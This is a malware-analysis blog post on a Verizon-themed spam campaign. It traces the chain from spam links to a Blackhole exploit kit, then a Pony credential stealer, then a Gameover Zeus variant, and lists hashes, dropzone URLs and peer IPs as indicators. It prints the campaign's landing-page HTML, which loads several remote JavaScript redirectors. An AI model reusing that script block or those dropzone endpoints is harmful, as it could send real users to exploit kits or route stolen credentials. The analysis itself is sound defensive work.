Your Bill Is Now Available

Another day and another new spam template. We picked a Verizon Wireless themed spam campaign. The sample we studied had the subject line “Your Bill Is Now Available”.

The observed spam sample contained the following malicious links:

These pages all contained the following html code:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type=”text/javascript” src=”http://muttonheadcollective.com/XvLBzokA/js.js”></script&gt;
<script type=”text/javascript” src=”http://auto-escolas.com/TfFQ7r6J/js.js”></script&gt;
<script type=”text/javascript” src=”http://rgexcel.com/CPD4MoEs/js.js”></script&gt;
<script type=”text/javascript” src=”http://turkwebalan.com/oUvuQ0b7/js.js”></script&gt;
<script type=”text/javascript” src=”http://vita-shop.hu/dSSjc0ag/js.js”></script&gt;
<script type=”text/javascript” src=”http://wilbrahamweddings.co.uk/qsTCVQXM/js.js”></script&gt;
<script type=”text/javascript” src=”http://www.bestcar.ee/0AfKWVDW/js.js”></script&gt;
<script type=”text/javascript” src=”http://www.unimoveis.net/jW57W6aZ/js.js”></script&gt;

During our initial analysis these javascript redirectors bounced victims to a Blackhole Exploit kit at http://slickcurve.com/showthread.php?t=d7ad916d1c0396ff.

This kit dropped a Pony downloader with the following properties:

File: info.exe
Size: 118809
MD5: 99FAB94FD824737393F5184685E8EDF2

This Pony downloader  hijacked FTP credential and sent them to the following dropzone http://176.28.18.135:8080/pony/gate.php. This Pony variant was also configured to send stolen FTP credentials to the following backup dropzones if the primary at 176.28.18.135 was unavailable:

The Pony downloader then grabbed the same Gameover Zeus variant from any of the following locations:

This Gameover Zeus variant had the following properties:

Size: 306712
MD5: 86A548CADA5636B4A8ED7DE5F654FF96

The Gameover Zeus variant was configured to download its configuration file from the following peers via UDP:

27.119.46.174:22985
94.66.81.228:15663
94.203.147.11:20599
94.53.198.35:24596
68.150.204.237:16150
144.122.8.23:16622
99.190.137.80:12109
99.169.224.231:22266
190.26.120.90:22952
201.171.193.38:21552
175.141.221.126:24400
91.179.41.185:15941
79.115.226.238:14247
87.126.224.174:11314
82.131.141.80:27735
72.199.188.132:25142
165.228.237.204:17223
92.241.134.103:26870
151.40.245.8:19197
78.179.68.249:26051

This Zeus variant had a botid of NR22 and sent keylogged data to the following dropzone 84.109.164.131:23440/index.php.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: